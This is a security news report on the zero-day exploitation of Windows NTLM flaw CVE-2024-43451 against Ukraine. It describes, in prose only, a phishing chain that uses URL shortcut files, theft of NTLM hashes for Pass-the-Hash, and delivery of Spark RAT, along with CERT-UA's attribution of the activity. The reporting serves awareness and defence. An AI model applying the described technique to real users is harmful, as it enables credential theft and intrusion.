A newly discovered security flaw in Windows NT LAN Manager (NTLM), labeled CVE-2024-43451 with a CVSS score of 6.5, has been exploited as a zero-day vulnerability by a suspected Russia-linked actor in cyberattacks against Ukraine.
The vulnerability, which Microsoft has recently patched, allows attackers to steal a user’s NTLMv2 hash by tricking users into minimal interaction with malicious files—such as single-clicking or right-clicking a file. The flaw can be activated without requiring the user to fully open or execute the file, making it easier for attackers to exploit.
Israeli cybersecurity company ClearSky uncovered the exploitation of this vulnerability in June 2024, which is reportedly being used in a complex attack chain. This chain delivers the Spark RAT, an open-source malware, to affected systems. ClearSky noted that the vulnerability abuses URL files to initiate malicious actions. In this case, malicious files were strategically hosted on an official Ukrainian government website intended for downloading academic certificates, indicating a targeted approach by the threat actor.
The attack method primarily involves phishing emails originating from a compromised Ukrainian government server. These emails prompt recipients to renew their academic certificates by clicking on a malicious URL within the message. When victims click, they inadvertently download a ZIP archive containing a dangerous URL shortcut file. This file triggers the vulnerability if the victim interacts with it in any way, such as right-clicking or attempting to move the file.
Once triggered, the URL file establishes a connection to a remote server where additional malware payloads, including Spark RAT, are downloaded. ClearSky’s investigation highlighted that this process raises alerts in sandbox environments, especially regarding an attempt to pass the NTLM hash via the SMB (Server Message Block) protocol. Capturing the NTLM hash allows attackers to perform a Pass-the-Hash attack, enabling them to authenticate as the victim user without needing their password, escalating the attack’s impact.
In response, the Computer Emergency Response Team of Ukraine (CERT-UA) has linked this activity to a Russian threat actor designated as UAC-0194. CERT-UA has also observed related phishing attacks that use tax-related themes to distribute LiteManager, a remote desktop tool, in a financially motivated campaign attributed to another actor known as UAC-0050.
CERT-UA warned that accountants using remote banking systems are particularly vulnerable, and in some cases, funds can be stolen within an hour of the initial attack. This series of attacks underscores the advanced tactics used by threat actors and highlights the ongoing cyber risk to Ukraine’s critical sectors.
